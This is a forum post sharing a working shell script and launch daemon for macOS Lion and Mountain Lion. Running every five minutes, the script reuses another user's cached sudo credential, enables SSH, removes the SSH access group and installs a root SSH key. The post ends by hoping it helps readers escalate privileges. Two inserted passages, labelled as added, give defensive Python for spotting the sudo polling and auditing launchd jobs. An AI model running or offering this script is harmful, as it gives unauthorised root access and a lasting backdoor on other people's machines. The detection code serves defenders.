Some of you may remember we were talking about stealing sudo privs from logged-in users some time ago. I'd noticed behaviour on an older Red Hat distro which granted sudo to a user even if it wasn't created by the same session.

Recently a coworker and I have started being childish - whenever someone leaves a machine unlocked, the other changes the background to something not-quite-completely-offensive. As part of that, I decided it was necessary to steal root privileges on the machine, strictly for amusement purposes.

This script is written for a Mac OS X Mountain Lion machine. It also works under Lion. It is ridiculously noisy, generating stacks of logs every couple of minutes while it waits in the background trying to steal sudo privs. There are other alternatives to this method - you could tail the history file until sudo is run, which would be a lot quieter, for example.

Regardless, if you have a copy of sudo that accepts the -n switch, you should be able to make it work.
Code:
#!/bin/sh

# Probe non-interactively: with -n, sudo exits non-zero instead of prompting
# when there is no cached credential for this user, so the script can poll
# quietly until someone else's sudo timestamp becomes usable.
sudo -n id -u > /dev/null
if [ $? -eq 0 ];
then
    (
    # A cached credential is available: enable remote login, remove the
    # access group that restricts SSH to its members, and install a root key.
    # The "> /tmp/authorized_keys" redirect runs as the calling user (not via
    # sudo), so the key is staged in /tmp and then moved into place as root.
    sudo systemsetup -setremotelogin on
    sudo dscl localhost -delete /Local/Default/Groups/com.apple.access_ssh
    sudo mkdir /var/root/.ssh && \
    sudo chmod 0700 /var/root/.ssh && \
    sudo chown root:wheel /var/root/.ssh && \
    sudo perl -e 'print qq|SSH KEY HERE|;' > /tmp/authorized_keys && \
    sudo mv /tmp/authorized_keys /var/root/.ssh/authorized_keys && \
    sudo chmod 0600 /var/root/.ssh/authorized_keys && \
    sudo chown root:wheel /var/root/.ssh/authorized_keys
    ) > /dev/null
fi

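The noise the script generates is also what gives it away: every failed `sudo -n` is logged with the reason "a password is required" and, because a launchd job has no terminal, with `TTY=unknown`. The following is an added example for the defender's side (it is not part of the original post and not the author's code); it parses syslog-style sudo lines and reports users whose tty-less attempts fail at a steady cadence and then suddenly succeed. The log lines are constructed to mirror the standard sudo syslog layout, and the year used for timestamp arithmetic is an assumption, since syslog timestamps carry none.

```python
"""Spot steady tty-less sudo polling in syslog-style sudo log lines.

Added example, not part of the original post. It assumes the classic sudo
syslog record layout: "<user> : [<reason> ;] TTY=<tty> ; PWD=<dir> ;
USER=<runas> ; COMMAND=<cmd>", where a non-interactive "sudo -n" that would
need a password logs the reason "a password is required" and a job without a
terminal logs TTY=unknown.
"""
import re
from collections import defaultdict
from datetime import datetime

ASSUMED_YEAR = 2013  # syslog timestamps carry no year; assumed for gap arithmetic

# Constructed sample log (not real data): three five-minute polls that fail,
# an interactive sudo by the same user, two tty-less runs that then succeed on
# the cached credential, and an unrelated interactive sudo by another user.
SAMPLE_LOG = """\
Aug 12 09:00:01 mac sudo[401]: admin : a password is required ; TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/id -u
Aug 12 09:05:01 mac sudo[455]: admin : a password is required ; TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/id -u
Aug 12 09:10:01 mac sudo[502]: admin : a password is required ; TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/id -u
Aug 12 09:12:30 mac sudo[530]: admin : TTY=ttys001 ; PWD=/Users/admin ; USER=root ; COMMAND=/usr/sbin/softwareupdate -l
Aug 12 09:15:01 mac sudo[560]: admin : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/id -u
Aug 12 09:15:02 mac sudo[561]: admin : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/sbin/systemsetup -setremotelogin on
Aug 12 09:20:00 mac sudo[600]: bob : TTY=ttys002 ; PWD=/Users/bob ; USER=root ; COMMAND=/bin/ls
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sudo\[\d+\]: "
    r"(?P<user>\S+) : (?:(?P<reason>[^;]+?) ; )?TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)


def parse_sudo_log(text):
    """Return one dict per sudo record; lines that are not sudo records are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%b %d %H:%M:%S").replace(year=ASSUMED_YEAR)
        events.append(rec)
    return events


def find_sudo_polling(text, min_failures=3, jitter_s=30):
    """Flag users whose tty-less sudo attempts fail repeatedly at a steady cadence.

    Each finding carries the failure count, whether the gaps between failures
    are regular (a scheduler, not a human), the mean period, and any tty-less
    commands that later succeeded, i.e. the moment a cached credential was reused.
    """
    by_user = defaultdict(list)
    for e in parse_sudo_log(text):
        if e["tty"] == "unknown":
            by_user[e["user"]].append(e)

    findings = []
    for user, evs in sorted(by_user.items()):
        failures = [e for e in evs if e["reason"] == "a password is required"]
        if len(failures) < min_failures:
            continue
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(failures, failures[1:])]
        successes = [e["cmd"] for e in evs
                     if e["reason"] is None and e["ts"] > failures[0]["ts"]]
        findings.append({
            "user": user,
            "failures": len(failures),
            "regular": max(gaps) - min(gaps) <= jitter_s,
            "period_s": round(sum(gaps) / len(gaps)),
            "successes": successes,
        })
    return findings


if __name__ == "__main__":
    for finding in find_sudo_polling(SAMPLE_LOG):
        print(finding)
```

On the sample above the only finding is for `admin`: three failures exactly 300 s apart, followed by two tty-less commands that succeeded once an interactive session had cached a credential. The mitigation lives in sudoers rather than in log review: `Defaults tty_tickets` binds a cached credential to the terminal it was entered on, so a terminal-less job cannot reuse it, and `Defaults timestamp_timeout=0` removes credential caching altogether.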
I have it wrapped in a launch daemon:
Code:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.dracyrys.sudograbber</string>
    <key>ProgramArguments</key>
    <array>
        <string>/bin/sh</string>
        <string>/Users/admin/.script/grab.sudo.sh</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>300</integer>
</dict>
</plist>

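The launch daemon is the persistence half of the technique, and its shape is easy to audit: a system-wide job that runs a shell script out of a hidden directory under a user's home on a short `StartInterval`. The following is an added example, not code from the original post, that parses launchd job plists with the standard `plistlib` module and flags those indicators. Both sample plists are constructed; the first is modelled on the one above with a placeholder label and script path, the second is a benign job with a system path, and `/usr/libexec/example-daemon` is a placeholder rather than a real binary.

```python
"""Audit launchd job plists for the polling-persistence pattern shown above.

Added example, not from the original post. It flags jobs whose program lives
in a user-writable or hidden path and jobs that poll on a short StartInterval.
The two sample plists are constructed; the first is modelled on the post's.
"""
import plistlib
from pathlib import Path

INTERPRETERS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/perl",
                "/usr/bin/python", "/usr/bin/osascript"}
USER_WRITABLE = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/")

SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.poller</string>
    <key>ProgramArguments</key>
    <array><string>/bin/sh</string><string>/Users/admin/.script/poll.sh</string></array>
    <key>RunAtLoad</key><true/>
    <key>StartInterval</key><integer>300</integer>
</dict>
</plist>
"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.service</string>
    <key>ProgramArguments</key><array><string>/usr/libexec/example-daemon</string></array>
    <key>RunAtLoad</key><true/>
    <key>KeepAlive</key><true/>
</dict>
</plist>
"""


def audit_launchd_job(data, max_interval_s=600):
    """Return (label, findings) for one plist; an empty findings list means nothing flagged."""
    job = plistlib.loads(data)
    label = job.get("Label", "<unlabelled>")
    args = list(job.get("ProgramArguments") or [])
    if "Program" in job:           # Program is an alternative to ProgramArguments
        args.insert(0, job["Program"])
    findings = []
    paths = [a for a in args if a.startswith("/")]
    # An interpreter followed by a script path: the script, not /bin/sh, is the real program.
    if paths and paths[0] in INTERPRETERS and len(paths) > 1:
        findings.append(f"{paths[0]} runs script {paths[1]}")
    for p in paths:
        if p.startswith(USER_WRITABLE):
            findings.append(f"program in user-writable location: {p}")
        if any(part.startswith(".") for part in p.split("/") if part):
            findings.append(f"hidden path component: {p}")
    interval = job.get("StartInterval")
    if isinstance(interval, int) and interval <= max_interval_s:
        findings.append(f"polls every {interval}s via StartInterval")
    return label, findings


def scan_launchd_dirs(dirs=("/Library/LaunchDaemons", "/Library/LaunchAgents",
                            str(Path.home() / "Library/LaunchAgents"))):
    """Audit every .plist under the usual launchd directories; unreadable files are reported, not skipped."""
    report = {}
    for d in dirs:
        for f in Path(d).glob("*.plist"):
            try:
                label, findings = audit_launchd_job(f.read_bytes())
            except Exception as exc:  # not an XML/binary plist, or unreadable
                report[str(f)] = [f"could not parse: {exc}"]
                continue
            if findings:
                report[str(f)] = [f"{label}: {x}" for x in findings]
    return report


if __name__ == "__main__":
    for sample in (SUSPICIOUS_PLIST, BENIGN_PLIST):
        print(audit_launchd_job(sample))
    for path, notes in scan_launchd_dirs().items():
        print(path, notes)
```

Run stand-alone it prints four findings for the constructed poller job and none for the benign one, then walks the real launchd directories on the host it runs on. The `RunAtLoad` key is deliberately not treated as an indicator on its own, since most legitimate daemons set it; it is the combination of a short interval with a script in a user-writable, hidden path that stands out.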
There are a number of viable options for using this sort of access - in this case I have started SSH and granted root the ability to log in with an SSH key.

As always, I'm not supporting the code, merely pointing out that it works in a very new operating environment. sudo on Mountain Lion is 1.7.4p6.

Hopefully you find it interesting, and it helps escalate your privs next time all else has failed you.